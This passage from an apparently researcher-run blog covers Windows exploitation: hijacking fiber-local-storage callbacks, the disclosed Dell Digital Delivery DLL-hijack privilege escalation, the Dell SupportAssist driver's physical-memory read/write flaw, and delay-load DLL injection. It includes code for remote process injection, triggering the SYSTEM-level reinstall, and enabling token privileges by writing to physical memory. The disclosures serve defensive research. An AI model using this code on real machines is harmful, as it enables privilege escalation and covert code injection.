    HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)TestFiber, 0, 0, &tid);
    WaitForSingleObject(hThread, INFINITE);
    return 0;
}

We need to spawn off the test in a new thread, as the main thread will always have a fiber instantiated and the call will fail. If we run this in a debugger we can inspect the data after the break:

0:000> ~
.  0  Id: 1674.1160 Suspend: 1 Teb: 7ffde000 Unfrozen
#  1  Id: 1674.c78 Suspend: 1 Teb: 7ffdd000 Unfrozen
0:000> dt _NT_TIB 7ffdd000 FiberData
ucrtbased!_NT_TIB
   +0x010 FiberData : 0x002ea9c0 Void
0:000> dd poi(0x002ea9c0) l5
002ea998  41414141 41414141 41414141 41414141
002ea9a8  abababab

In addition to fiber data, fibers also have access to the fiber local storage (FLS). For all intents and purposes, this is identical to thread local storage (TLS)[2]. This allows all thread fibers access to shared data via a global index. The API for this is pretty simple, and very similar to TLS. In the following sample, we’ll allocate an index and toss some values in it. Using our previous example as base:

lpFirstFiber = ConvertThreadToFiber(lpFiberData);
dwIdx = FlsAlloc(NULL);
FlsSetValue(dwIdx, lpFiberData);
DebugBreak();

A pointer to this data is stored in the thread’s TEB, and can be extracted from TEB->FlsData. From the above example, assume the returned FLS index for this data is 6:

0:001> ~
   0  Id: 15f0.a10 Suspend: 1 Teb: 7ffdf000 Unfrozen
.  1  Id: 15f0.c30 Suspend: 1 Teb: 7ffde000 Unfrozen
0:001> dt _TEB 7ffde000 FlsData
ntdll!_TEB
   +0xfb4 FlsData : 0x0049a008 Void
0:001> dd poi(0x0049a008+(4*8))
0049a998  41414141 41414141 41414141 41414141
0049a9a8  abababab

Note that the offset is always the index + 2.
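
In C terms, for an index dwIdx the slot can be read as in the following sketch, where FlsData is the pointer taken from the TEB:

// FLS slot lookup as seen in the dump above: the data starts two pointers in
PVOID value = ((PVOID *)FlsData)[dwIdx + 2];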

Abusing FLS Callbacks to Obtain Execution Control

Let’s return to that FlsAlloc call from the above example. Its first parameter is a PFLS_CALLBACK_FUNCTION[3] and is used for, according to MSDN:

An application-defined function. If the FLS slot is in use, FlsCallback is
called on fiber deletion, thread exit, and when an FLS index is freed. Specify
this function when calling the FlsAlloc function. The PFLS_CALLBACK_FUNCTION
type defines a pointer to this callback function. 

Well isn’t that lovely. These callbacks are stored process wide in PEB->FlsCallback. Let’s try it out:

dwIdx = FlsAlloc((PFLS_CALLBACK_FUNCTION)0x41414141);

And fetching it (assuming again an index of 6):

0:001> dt _PEB 7ffd8000 FlsCallback
ucrtbased!_PEB
   +0x20c FlsCallback : 0x002d51f8 _FLS_CALLBACK_INFO
0:001> dd 0x002d51f8 + (2 * 6 * 4) l1
002d5228  41414141

What happens when we let this run to process exit?

0:001> g
(10a8.1328): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=7ffd8000 ecx=002da998 edx=002d522c esi=00000006 edi=002da028
eip=41414141 esp=0051f71c ebp=0051f734 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
41414141 ??              ???

Recall the MSDN comment about when the FLS callback is invoked: ..on fiber deletion, thread exit, and when an FLS index is freed. This means that, worst case, our code executes once the process exits; best case, following a thread’s exit or a call to FlsFree. It’s worth reiterating that the primary thread for each process will have a fiber instantiated already; it’s quite possible that this thread isn’t around anymore, but this doesn’t matter as the callbacks are at the process level.

Another salient point here is the first parameter to the callback function. This parameter is the value of whatever was in the indexed slot and is also stashed in ECX/RCX before invoking the callback:

dwIdx = FlsAlloc((PFLS_CALLBACK_FUNCTION)0x41414141);
FlsSetValue(dwIdx, (PVOID)0x42424242);
DebugBreak();

Which, when executed:

(aa8.169c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=7ffd9000 ecx=42424242 edx=003c522c esi=00000006 edi=003ca028
eip=41414141 esp=006ef9c0 ebp=006ef9d8 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
41414141 ??              ???

Under specific circumstances, this can be quite useful.

Anyway, PoC||GTFO, I’ve included some code below. In it, we overwrite the msvcrt!_freefls call used to free the FLS buffer.

#ifdef _WIN64
#define FlsCallbackOffset 0x320
#else
#define FlsCallbackOffset 0x20c
#endif

void OverwriteFlsCallback(LPVOID dwNewAddr, HANDLE hProcess) 
{
    _NtQueryInformationProcess NtQueryInformationProcess = (_NtQueryInformationProcess)GetProcAddress(GetModuleHandleA("ntdll"), 
                                                            "NtQueryInformationProcess");
    const char *payload = "\xcc\xcc\xcc\xcc";
    PROCESS_BASIC_INFORMATION pbi;
    SIZE_T sCallback = 0, sRetLen = 0;
    LPVOID lpBuf = NULL;

    //
    // allocate memory and write in our payload as one would normally do
    //

    lpBuf = VirtualAllocEx(hProcess, NULL, sizeof(SIZE_T), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hProcess, lpBuf, payload, sizeof(SIZE_T), NULL);

    // now we need to fetch the remote process PEB
    NtQueryInformationProcess(hProcess, PROCESSINFOCLASS(0), &pbi,
                              sizeof(PROCESS_BASIC_INFORMATION), NULL);

    // read the FlsCallback address out of it
    ReadProcessMemory(hProcess, (LPVOID)(((SIZE_T)pbi.PebBaseAddress) + FlsCallbackOffset), 
                          (LPVOID)&sCallback, sizeof(SIZE_T), &sRetLen);
    sCallback += 2 * sizeof(SIZE_T);

    // we're targeting the _freefls call, so overwrite that with our payload
    // address 
    WriteProcessMemory(hProcess, (LPVOID)sCallback, &dwNewAddr, sizeof(SIZE_T), &sRetLen);
}

I tested this on an updated Windows 10 x64 against notepad and mspaint; on process exit, the callback is executed and we gain control over execution flow. Pretty useful in the end; more on this soon…

References

[0] http://www.hexacorn.com
[1] https://docs.microsoft.com/en-us/windows/win32/procthread/fibers
[2] https://docs.microsoft.com/en-us/windows/win32/procthread/thread-local-storage
[3] https://docs.microsoft.com/en-us/windows/win32/api/winnt/nc-winnt-pfls_callback_function

Dell Digital Delivery - CVE-2018-11072 - Local Privilege Escalation

22 August 2018 at 21:10

Back in March or April I began reversing a slew of Dell applications installed on a laptop I had. Many of them had privileged services or processes running and seemed to perform a lot of different complex actions. I previously disclosed a LPE in SupportAssist[0], and identified another in their Digital Delivery platform. This post will detail a Digital Delivery vulnerability and how it can be exploited. This was privately discovered and disclosed, and no known active exploits are in the wild. Dell has issued a security advisory for this issue, which can be found here[4].

I’ll have another follow-up post detailing the internals of this application and a few others to provide any future researchers with a starting point. Both applications are rather complex and expose a large attack surface. If you’re interested in bug hunting LPEs in large C#/C++ applications, it’s a fine place to begin.

Dell’s Digital Delivery[1] is a platform for buying and installing system software. It allows users to purchase or manage software packages and reinstall them as necessary. Once again, it comes “..preinstalled on most Dell systems.”[1]

Bug

The Digital Delivery service runs as SYSTEM under the name DeliveryService, which runs the DeliveryService.exe binary. A userland binary, DeliveryTray.exe, is the user-facing component that allows users to view installed applications or reinstall previously purchased ones.

Communication from DeliveryTray to DeliveryService is performed via a Windows Communication Foundation (WCF) named pipe. If you’re unfamiliar with WCF, it’s essentially a standard methodology for exchanging data between two endpoints[2]. It allows a service to register a processing endpoint and expose functionality, similar to a web server with a REST API.

For those following along at home, you can find the initialization of the WCF pipe in Dell.ClientFulfillmentService.Controller.Initialize:

this._host = WcfServiceUtil.StandupServiceHost(typeof(UiWcfSession),
                                typeof(IClientFulfillmentPipeService),
                                "DDDService");

This invokes Dell.NamedPipe.StandupServiceHost:

ServiceHost host = null;
string apiUrl = "net.pipe://localhost/DDDService/IClientFulfillmentPipeService";
Uri realUri = new Uri("net.pipe://localhost/" + Guid.NewGuid().ToString());
Tryblock.Run(delegate
{
  host = new ServiceHost(classType, new Uri[]
  {
    realUri
  });
  host.AddServiceEndpoint(interfaceType, WcfServiceUtil.CreateDefaultBinding(), string.Empty);
  host.Open();
}, null, null);
AuthenticationManager.Singleton.RegisterEndpoint(apiUrl, realUri.AbsoluteUri);

The endpoint is thus registered and listening and the AuthenticationManager singleton is responsible for handling requests. Once a request comes in, the AuthenticationManager passes this off to the AuthPipeWorker function which, among other things, performs the following authentication:

string execuableByProcessId = AuthenticationManager.GetExecuableByProcessId(processId);
bool flag2 = !FileUtils.IsSignedByDell(execuableByProcessId);
if (!flag2)
{
    ...

If the process on the other end of the request is backed by a signed Dell binary, the request is allowed and a connection may be established. If not, the request is denied.

I noticed that this is new behavior, added sometime between 3.1 (my original testing) and 3.5 (latest version at the time, 3.5.1001.0), so I assume Dell is aware of this as a potential attack vector. Unfortunately, this mitigation is inadequate to protect the endpoint. I was able to get around it by simply spawning an executable signed by Dell (DeliveryTray.exe, for example) and injecting code into it. Once code is injected, the WCF API exposed by the privileged service is accessible.
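
A sketch of that bypass: spawn the signed binary suspended, then write and run a stub that loads the WCF client. The module path and payload bytes here are placeholders:

STARTUPINFOA si = { sizeof(si) };
PROCESS_INFORMATION pi = { 0 };
unsigned char payload[] = { 0xcc };  // placeholder; really a loader for the C# client

// DeliveryTray.exe is signed by Dell, satisfying the pipe's caller check
CreateProcessA(NULL, (LPSTR)"DeliveryTray.exe", NULL, NULL, FALSE,
               CREATE_SUSPENDED, NULL, NULL, &si, &pi);

LPVOID lpBuf = VirtualAllocEx(pi.hProcess, NULL, sizeof(payload),
                              MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess, lpBuf, payload, sizeof(payload), NULL);
CreateRemoteThread(pi.hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpBuf, NULL, 0, NULL);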

The endpoint service itself is implemented by Dell.NamedPipe, and exposes a dozen or so different functions. Those include:

ArchiveAndResetSettings
EnableEntitlements
EnableEntitlementsAsync
GetAppSetting
PingTrayApp
PollEntitlementService
RebootMachine
ReInstallEntitlement
ResumeAllOperations
SetAppSetting
SetAppState
SetEntitlementList
SetUserDownloadChoice
SetWallpaper
ShowBalloonTip
ShutDownApp
UpdateEntitlementUiState

Digital Delivery calls application install packages “entitlements”, so the references to installation/reinstallation are specific to those packages either available or presently installed.

One of the first functions I investigated was ReInstallEntitlement, which allows one to initiate a reinstallation process of an installed entitlement. This code performs the following:

private static void ReInstallEntitlementThreadStart(object reInstallArgs)
{
    PipeServiceClient.ReInstallArgs ra = (PipeServiceClient.ReInstallArgs)reInstallArgs;
    PipeServiceClient.TryWcfCall(delegate
    {
        PipeServiceClient._commChannel.ReInstall(ra.EntitlementId, ra.RunAsUser);
    }, string.Concat(new object[]
    {
        "ReInstall ",
        ra.EntitlementId,
        " ",
        ra.RunAsUser.ToString()
    }));
}

This builds the arguments from the request and invokes a WCF call, which is sent to the WCF endpoint. The ReInstallEntitlement call takes two arguments: an entitlement ID and a RunAsUser flag. These are both controlled by the caller.

On the server side, Dell.ClientFulfillmentService.Controller handles implementation of these functions, and OnReInstall handles the entitlement reinstallation process. It does a couple of sanity checks, validates the package signature, and hits the InstallationManager to queue the install request. The InstallationManager has a job queue and background thread (WorkingThread) that occasionally polls for new jobs and, when it receives the install job, kicks off InstallSoftware.

Because we’re reinstalling an entitlement, the package is cached to disk and ready to be installed. I’m going to gloss over a few installation steps here because they’re frankly standard and menial.

The installation packages are located in C:\ProgramData\Dell\DigitalDelivery\Downloads\Software\ and are first unzipped, followed by an installation of the software. In my case, I was triggering the installation of Dell Data Protection - Security Tools v1.9.1, and if you follow along in procmon, you’ll see it start up an install process:

"C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _
Security Tools v1.9.1\STSetup.exe" -y -gm2 /S /z"\"CIRRUS_INSTALL,
SUPPRESSREBOOT=1\""

The user this process runs as is determined by the controllable RunAsUser flag; if set to False, it runs as SYSTEM out of the %ProgramData% directory.

During process launch of the STSetup process, I noticed the following in procmon:

C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\VERSION.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\UxTheme.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\PROPSYS.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\apphelp.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\Secur32.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\api-ms-win-downlevel-advapi32-l2-1-0.dll

Of interest here is that the parent directory, %ProgramData%\Dell\Digital Delivery\Downloads\Software, is not writable by unprivileged users, but the entitlement package folders, Dell Data Protection - Security Tools in this case, are.

This allows non-privileged users to drop arbitrary files into this directory, granting us a DLL hijacking opportunity.

Exploitation

Exploiting this requires several steps:

  1. Drop a DLL under the appropriate %ProgramData% software package directory
  2. Launch a new process running an executable signed by Dell
  3. Inject C# into this process (which is running unprivileged in userland)
  4. Connect to the WCF named pipe from within the injected process
  5. Trigger ReInstallEntitlement

Steps 4 and 5 can be performed using the following:

PipeServiceClient client = new PipeServiceClient();
client.Initialize();

while (PipeServiceClient.AppState == AppState.Initializing)
  System.Threading.Thread.Sleep(1000);

EntitlementUiWrapper entitle = PipeServiceClient.EntitlementList[0];
PipeServiceClient.ReInstallEntitlement(entitle.ID, false);
System.Threading.Thread.Sleep(30000);

PipeServiceClient.CloseConnection();

The classes used above are imported from NamedPipe.dll. Note that we’re simply choosing the first entitlement available and reinstalling it. You may need to iterate over entitlements to identify the correct package pointing to where you dropped your DLL.

I’ve provided a PoC on my Github here[3], and Dell has additionally released a security advisory, which can be found here[4].

Timeline

05/24/18 – Vulnerability initially reported
05/30/18 – Dell requests further information
06/26/18 – Dell provides update on review and remediation
07/06/18 – Dell provides internal tracking ID and update on progress
07/24/18 – Update request
07/30/18 – Dell confirms they will issue a security advisory and associated CVE
08/07/18 – 90 day disclosure reminder provided
08/10/18 – Dell confirms 8/22 disclosure date alignment
08/22/18 – Public disclosure

References

[0] http://hatriot.github.io/blog/2018/05/17/dell-supportassist-local-privilege-escalation/
[1] https://www.dell.com/learn/us/en/04/flatcontentg/dell-digital-delivery
[2] https://docs.microsoft.com/en-us/dotnet/framework/wcf/whats-wcf
[3] https://github.com/hatRiot/bugs
[4] https://www.dell.com/support/article/us/en/04/SLN313559

Dell SupportAssist Driver - Local Privilege Escalation

18 May 2018 at 04:00

This post details a local privilege escalation (LPE) vulnerability I found in Dell’s SupportAssist[0] tool. The bug is in a kernel driver loaded by the tool, and is pretty similar to bugs found by ReWolf in ntiolib.sys/winio.sys[1], and those found by others in ASMMAP/ASMMAP64[2]. These bugs are pretty interesting because they can be used to bypass driver signature enforcement (DSE) ad infinitum, or at least until they’re no longer compatible with newer operating systems.

Dell's SupportAssist is, according to the site, "(..) now preinstalled on most of all new Dell devices running Windows operating system (..)". Its primary purpose is to troubleshoot issues and provide support capabilities both to the user and to Dell. There's a lot of functionality in the software itself, which I spent quite a bit of time reversing and may blog about at a later date.

Bug

Calling this a “bug” is really a misnomer; the driver exposes this functionality eagerly. It actually exposes a lot of functionality, much like some of the previously mentioned drivers. It provides capabilities for reading and writing the model-specific register (MSR), resetting the 1394 bus, and reading/writing CMOS.

The driver is first loaded when the SupportAssist tool is launched, and the filename is pcdsrvc_x64.pkms on x64 and pcdsrvc.pkms on x86. Incidentally, this driver isn't actually built by Dell, but rather by another company, PC-Doctor[3]. This company provides "system health solutions" to a variety of companies, including Dell, Intel, Yokogawa, IBM, and others. Therefore, it's highly likely that this driver can be found in a variety of other products…

Once the driver is loaded, it exposes a symlink to the device at PCDSRVC{3B54B31B-D06B6431-06020200}_0 which is writable by unprivileged users on the system. This allows us to trigger any of the roughly 30 IOCTLs exposed by the driver. I found a DLL used by the userland agent that served as an interface to the kernel driver and conveniently had symbol names available, allowing me to extract the following:

// 0x222004 = driver activation ioctl
// 0x222314 = IoDriver::writePortData
// 0x22230c = IoDriver::writePortData
// 0x222304 = IoDriver::writePortData
// 0x222300 = IoDriver::readPortData
// 0x222308 = IoDriver::readPortData
// 0x222310 = IoDriver::readPortData
// 0x222700 = EcDriver::readData
// 0x222704 = EcDriver::writeData
// 0x222080 = MemDriver::getPhysicalAddress
// 0x222084 = MemDriver::readPhysicalMemory
// 0x222088 = MemDriver::writePhysicalMemory
// 0x222180 = Msr::readMsr
// 0x222184 = Msr::writeMsr
// 0x222104 = PciDriver::readConfigSpace
// 0x222108 = PciDriver::writeConfigSpace
// 0x222110 = PciDriver::?
// 0x22210c = PciDriver::?
// 0x222380 = Port1394::doesControllerExist
// 0x222384 = Port1394::getControllerConfigRom
// 0x22238c = Port1394::getGenerationCount
// 0x222388 = Port1394::forceBusReset
// 0x222680 = SmbusDriver::genericRead
// 0x222318 = SystemDriver::readCmos8
// 0x22231c = SystemDriver::writeCmos8
// 0x222600 = SystemDriver::getDevicePdo
// 0x222604 = SystemDriver::getIntelFreqClockCounts
// 0x222608 = SystemDriver::getAcpiThermalZoneInfo

Immediately the MemDriver class jumps out. After some reversing, it appeared that these functions do exactly as expected: allow userland services to both read and write arbitrary physical addresses. There are a few quirks, however.

To start, the driver must first be “unlocked” in order for it to begin processing control codes. It’s unclear to me if this is some sort of hacky event trigger or whether the kernel developers truly believed this would inhibit malicious access. Either way, it’s goofy. To unlock the driver, a simple ioctl with the proper code must be sent. Once received, the driver will process control codes for the lifetime of the system.

To unlock the driver, we just execute the following:

BOOL bResult;
DWORD dwRet;
SIZE_T code = 0xA1B2C3D4, outBuf;

bResult = DeviceIoControl(hDriver, 0x222004, 
                          &code, sizeof(SIZE_T), 
                          &outBuf, sizeof(SIZE_T), 
                          &dwRet, NULL);

Once the driver receives this control code and validates the received code (0xA1B2C3D4), it sets a global flag and begins accepting all other control codes.

Exploitation

From here, we could exploit this the same way rewolf did [4]: read out physical memory looking for process pool tags, then traverse these until we identify our process as well as a SYSTEM process, then steal the token. However, PCD appears to give us a shortcut via the getPhysicalAddress ioctl. If this does indeed return the physical address of a given virtual address (VA), we can simply find the physical address of our VA and enable a couple of token privileges[5] using the writePhysicalMemory ioctl.

Here’s how the getPhysicalAddress function works:

v5 = IoAllocateMdl(**(PVOID **)(a1 + 0x18), 1u, 0, 0, 0i64);
v6 = v5;
if ( !v5 )
  return 0xC0000001i64;
MmProbeAndLockPages(v5, 1, 0);
**(_QWORD **)(v3 + 0x18) = v4 & 0xFFF | ((_QWORD)v6[1].Next << 0xC);
MmUnlockPages(v6);
IoFreeMdl(v6);

Keen observers will spot the problem here; the MmProbeAndLockPages call is passing in UserMode for the KPROCESSOR_MODE, meaning we won’t be able to resolve any kernel mode VAs, only usermode addresses.

We can still read chunks of physical memory unabated, however, as the readPhysicalMemory function is quite simple:

if ( !DoWrite )
{
  memmove(a1, a2, a3);
  return 1;
}

They reuse a single function for reading and writing physical memory; we’ll return to that. I decided to take a different approach than rewolf for a number of reasons with great results.

Instead, I wanted to toggle on SeDebugPrivilege for my current process token. This would require finding the token in memory and writing a few bytes at a field offset. To do this, I used readPhysicalMemory to read chunks of memory of size 0x10000000 and checked for the first field in a _TOKEN, TokenSource. In a user token, this will be the string User32. Once we’ve identified this, we double check that we’ve found a token by validating the TokenLuid, which we can obtain from userland using the GetTokenInformation API.
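
The FetchTokenId() helper used by the search loop below isn't reproduced in the post; a minimal sketch of it, assuming the low dword of the LUID suffices for the comparison, might be:

#include <windows.h>

DWORD TokenId = 0;

// hedged sketch of the FetchTokenId() helper referenced in the loop below:
// grabs the current token's LUID so candidate _TOKENs found in physical
// memory can be validated against it
void FetchTokenId(void)
{
    HANDLE hToken = NULL;
    TOKEN_STATISTICS stats = { 0 };
    DWORD cbReturned = 0;

    if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken))
    {
        if (GetTokenInformation(hToken, TokenStatistics, &stats,
                                sizeof(stats), &cbReturned))
            TokenId = stats.TokenId.LowPart; // low dword is enough to match on
        CloseHandle(hToken);
    }
}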

In order to speed up the memory search, I only iterate over the addresses that match the token’s virtual address byte index. Essentially, when you convert a virtual address to a physical address (PA) the byte index, or the lower 12 bits, do not change. To demonstrate, assume we have a VA of 0xfffff8a001cc2060. Translating this to a physical address then:

kd> !pte  fffff8a001cc2060
                                           VA fffff8a001cc2060
PXE at FFFFF6FB7DBEDF88    PPE at FFFFF6FB7DBF1400    PDE at FFFFF6FB7E280070    PTE at FFFFF6FC5000E610
contains 000000007AC84863  contains 00000000030D4863  contains 0000000073147863  contains E6500000716FD963
pfn 7ac84     ---DA--KWEV  pfn 30d4      ---DA--KWEV  pfn 73147     ---DA--KWEV  pfn 716fd     -G-DA--KW-V

kd> ? 716fd * 0x1000 + 060
Evaluate expression: 1903153248 = 00000000`716fd060

So our physical address is 0x716fd060 (if you’d like to read more about converting VA to PA, check out this great Microsoft article[6]). Notice the lower 12 bits remain the same between VA/PA. The search loop then boiled down to the following code:

uStartAddr = uStartAddr + (VirtualAddress & 0xfff);
for (USHORT chunk = 0; chunk < 0xb; ++chunk) {
    lpMemBuf = ReadBlockMem(hDriver, uStartAddr, 0x10000000);
    for(SIZE_T i = 0; i < 0x10000000; i += 0x1000, uStartAddr += 0x1000){
        if (memcmp((char*)lpMemBuf + i, "User32 ", 8) == 0){
            
            if (TokenId <= 0x0)
                FetchTokenId();

            if (*(DWORD*)((char*)lpMemBuf + i + 0x10) == TokenId) {
                hTokenAddr = uStartAddr;
                break;
            }
        }
    }

    HeapFree(GetProcessHeap(), 0, lpMemBuf);

    if (hTokenAddr > 0x0)
        break;
}

Once we identify the PA of our token, we trigger two separate writes at offset 0x40 and offset 0x48, or the Enabled and Default fields of a _TOKEN. This sometimes requires a few runs to get right (due to mapping, which I was too lazy to work out), but is very stable.
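
To sketch what those writes amount to: SeDebugPrivilege is LUID 20, so setting bit 20 in each 64-bit privilege bitmap is enough. The ReadPhysMem/WritePhysMem helpers below are hypothetical stand-ins for the PoC's ioctl wrappers; the real input buffer layout for 0x222084/0x222088 isn't shown here.

// hedged sketch of the two writes against the physical address of our token
ULONGLONG mask = 0;

ReadPhysMem(hDriver, hTokenAddr + 0x40, &mask, sizeof(mask));  // current Enabled bitmap
mask |= (1ULL << 20);                                          // set SeDebugPrivilege (LUID 20)
WritePhysMem(hDriver, hTokenAddr + 0x40, &mask, sizeof(mask)); // Enabled
WritePhysMem(hDriver, hTokenAddr + 0x48, &mask, sizeof(mask)); // Default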

You can find the source code for the bug here.

Timeline

04/05/18 – Vulnerability reported
04/06/18 – Initial response from Dell
04/10/18 – Status update from Dell
04/18/18 – Status update from Dell
05/16/18 – Patched version released (v2.2)

References

[0] http://www.dell.com/support/contents/us/en/04/article/product-support/self-support-knowledgebase/software-and-downloads/supportassist
[1] http://blog.rewolf.pl/blog/?p=1630
[2] https://www.exploit-db.com/exploits/39785/
[3] http://www.pc-doctor.com/
[4] https://github.com/rwfpl/rewolf-msi-exploit
[5] https://github.com/hatRiot/token-priv
[6] https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/converting-virtual-addresses-to-physical-addresses

Abusing delay load DLLs for remote code injection

19 September 2017 at 21:00

I always tell myself that I'll try posting more frequently on my blog, and yet here I am, two years later. Perhaps this post will provide the necessary motivation to conduct more public research. I do love it.

This post details a novel remote code injection technique I discovered while playing around with delay loading DLLs. It allows for the injection of arbitrary code into arbitrary remote, running processes, provided that they implement the abused functionality. To make it abundantly clear, this is not an exploit, it’s simply another strategy for migrating into other processes.

Modern code injection techniques typically rely on a variation of two different win32 API calls: CreateRemoteThread and NtQueueApc. Endgame recently put out a great article[0] detailing ten different methods of process injection. While not all of them allow for injection into remote processes, particularly those already running, it does detail the most common, public variations. This strategy is more akin to inline hooking, though we're not touching the IAT and we don't require our code to already be in the process. There are no calls to NtQueueApc or CreateRemoteThread, and no need for thread or process suspension. There are some limitations, as with anything, which I'll detail below.

Delay Load DLL

Delay loading is a linker strategy that allows for the lazy loading of DLLs. Executables commonly load all necessary dynamically linked libraries at runtime and perform the IAT fix-ups then. Delay loading, however, allows for these libraries to be lazy loaded at call time, supported by a pseudo IAT that's fixed up on first call. This process can be better illuminated by the decades-old figure below:

This image comes from a great Microsoft article released in 1998 [1] that describes the strategy quite well, but I’ll attempt to distill it here.

Portable executables contain a data directory named IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT, which you can see using dumpbin /imports or using windbg. The structure of this entry is described in delayhlp.cpp, included with the WinSDK:

struct InternalImgDelayDescr {
    DWORD           grAttrs;        // attributes
    LPCSTR          szName;         // pointer to dll name
    HMODULE *       phmod;          // address of module handle
    PImgThunkData   pIAT;           // address of the IAT
    PCImgThunkData  pINT;           // address of the INT
    PCImgThunkData  pBoundIAT;      // address of the optional bound IAT
    PCImgThunkData  pUnloadIAT;     // address of optional copy of original IAT
    DWORD           dwTimeStamp;    // 0 if not bound,
                                    // O.W. date/time stamp of DLL bound to (Old BIND)
    };

The table itself contains RVAs, not pointers. We can find the delay directory offset by parsing the file header:

0:022> lm m explorer
start    end        module name
00690000 00969000   explorer   (pdb symbols)          
0:022> !dh 00690000 -f

File Type: EXECUTABLE IMAGE
FILE HEADER VALUES

[...] 

   68A80 [      40] address [size] of Load Configuration Directory
       0 [       0] address [size] of Bound Import Directory
    1000 [     D98] address [size] of Import Address Table Directory
   AC670 [     140] address [size] of Delay Import Directory
       0 [       0] address [size] of COR20 Header Directory
       0 [       0] address [size] of Reserved Directory

The first entry and its delay linked DLL can be seen in the following:

0:022> dd 00690000+ac670 l8
0073c670  00000001 000ac7b0 000b24d8 000b1000
0073c680  000ac8cc 00000000 00000000 00000000
0:022> da 00690000+000ac7b0 
0073c7b0  "WINMM.dll"

This means that WINMM is dynamically linked to explorer.exe, but delay loaded, and will not be loaded into the process until the imported function is invoked. Once loaded, a helper function fixes up the pseudo IAT by using GetProcAddress to locate the desired function and patching the table at runtime.

The pseudo IAT referenced is separate from the standard PE IAT; this IAT is specifically for the delay load functions, and is referenced from the delay descriptor. So for example, in WINMM.dll’s case, the pseudo IAT for WINMM is at RVA 000b1000. The second delay descriptor entry would have a separate RVA for its pseudo IAT, and so on and so forth.

Using WINMM as our delay example, explorer imports one function from it, PlaySoundW. In my particular running instance, it has not been invoked, so the pseudo IAT has not been fixed up yet. We can see this by dumping its pseudo IAT entry:

0:022> dps 00690000+000b1000 l2
00741000  006dd0ac explorer!_imp_load__PlaySoundW
00741004  00000000

Each DLL entry is null terminated. The above pointer shows us that the existing entry is merely a springboard thunk within the Explorer process. This takes us here:

0:022> u explorer!_imp_load__PlaySoundW
explorer!_imp_load__PlaySoundW:
006dd0ac b800107400      mov     eax,offset explorer!_imp__PlaySoundW (00741000)
006dd0b1 eb00            jmp     explorer!_tailMerge_WINMM_dll (006dd0b3)
explorer!_tailMerge_WINMM_dll:
006dd0b3 51              push    ecx
006dd0b4 52              push    edx
006dd0b5 50              push    eax
006dd0b6 6870c67300      push    offset explorer!_DELAY_IMPORT_DESCRIPTOR_WINMM_dll (0073c670)
006dd0bb e8296cfdff      call    explorer!__delayLoadHelper2 (006b3ce9)

The tailMerge function is a linker-generated stub that’s compiled in per-DLL, not per function. The __delayLoadHelper2 function is the magic that handles the loading and patching of the pseudo IAT. Documented in delayhlp.cpp, this function handles calling LoadLibrary/GetProcAddress and patching the pseudo IAT. As a demonstration of how this looks, I compiled a binary that delay links dnslib. Here’s the process of resolution of DnsAcquireContextHandle:

0:000> dps 00060000+0001839c l2
0007839c  000618bd DelayTest!_imp_load_DnsAcquireContextHandle_W
000783a0  00000000
0:000> bp DelayTest!__delayLoadHelper2
0:000> g
ModLoad: 753e0000 7542c000   C:\Windows\system32\apphelp.dll
Breakpoint 0 hit
[...]
0:000> dd esp+4 l1
0024f9f4  00075ffc
0:000> dd 00075ffc l4
00075ffc  00000001 00010fb0 000183c8 0001839c
0:000> da 00060000+00010fb0 
00070fb0  "DNSAPI.dll"
0:000> pt
0:000> dps 00060000+0001839c l2
0007839c  74dfd0fc DNSAPI!DnsAcquireContextHandle_W
000783a0  00000000

Now the pseudo IAT entry has been patched up and the correct function is invoked on subsequent calls. This has the additional side effect of leaving the pseudo IAT as both executable and writable:

0:011> !vprot 00060000+0001839c
BaseAddress:       00371000
AllocationBase:    00060000
AllocationProtect: 00000080  PAGE_EXECUTE_WRITECOPY

At this point, the DLL has been loaded into the process and the pseudo IAT patched up. In a further twist, not all functions are resolved on load, only the one that is invoked. This leaves certain entries in the pseudo IAT in a mixed state:

00741044  00726afa explorer!_imp_load__UnInitProcessPriv
00741048  7467f845 DUI70!InitThread
0074104c  00726b0f explorer!_imp_load__UnInitThread
00741050  74670728 DUI70!InitProcessPriv
0:022> lm m DUI70
start    end        module name
74630000 746e2000   DUI70      (pdb symbols)

In the above, two of the four functions are resolved and the DUI70.dll library is loaded into the process. In each entry of the delay load descriptor, the structure referenced above maintains an RVA to the HMODULE. If the module isn't loaded, it will be null. So when a delayed function is invoked that's already loaded, the delay helper function will check its entry to determine if a handle to it can be used:

HMODULE hmod = *idd.phmod;
    if (hmod == 0) {
        if (__pfnDliNotifyHook2) {
            hmod = HMODULE(((*__pfnDliNotifyHook2)(dliNotePreLoadLibrary, &dli)));
            }
        if (hmod == 0) {
            hmod = ::LoadLibraryEx(dli.szDll, NULL, 0);
            }

The idd structure is just an instance of the InternalImgDelayDescr described above and passed into the __delayLoadHelper2 function from the linker tailMerge stub. If the module is already loaded, as referenced from the delay entry, then it uses that handle instead; it does NOT attempt to LoadLibrary again so long as that handle is non-null. This can be used to our advantage.

Another note here is that the delay loader supports notification hooks. There are six states we can hook into: processing start, pre load library, fail load library, pre GetProcAddress, fail GetProcAddress, and end processing. You can see how the hooks are used in the above code sample.
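
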